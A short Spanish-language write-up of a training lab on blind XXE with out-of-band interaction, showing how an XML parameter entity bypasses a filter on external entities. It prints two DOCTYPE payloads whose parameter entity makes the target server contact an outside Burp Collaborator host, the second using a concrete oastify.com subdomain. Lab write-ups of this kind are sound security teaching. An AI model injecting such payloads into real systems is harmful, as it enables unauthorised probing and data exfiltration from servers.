🦉Laboratorio: Blind XXE with out-of-band interaction via XML parameter entities

Este lab muy bien dice que tiene una medida de “seguridad” la cual es que bloquea las peticiones que contienen las entidades externas, entonces con base en ello haremos es una entidad de parametro haciendo referencia al burp-collaborator y veremos que pasa:

<!DOCTYPE foo [ <!ENTITY % test SYSTEM "http://Burp-Collaborator"> %test; ]>

Sabemos que las entidades de parametros en xml dentro del DTD se invocan con el signo % porcentaje y ademas de eso cuando se llaman en los valores de datos no es con ampersand sino directamente con %var-name;

• Hacemos las mismas validaciones tal cual como los demás labs anteriores.

<!DOCTYPE foo [ <!ENTITY % test SYSTEM "http://oc4g70rhr4vlhf27huaho4vtfklc93xs.oastify.com"> %test; ]>

En este caso vemos muy bien como el llamado de la entidad de parametro ya no se hace dentro de los valores de datos de productId sino que dentro de la misma estructura del DTD lo llamamos tal cual:

Y aunque el response nos da un error:

Si nos vamos a burp-collaborator vemos que tenemos las siguientes resoluciones DNS:

Si vemos el lab, exitosamente hemos resuelto el lab:

Eso es todo, si lees esto que esperas? hazlo!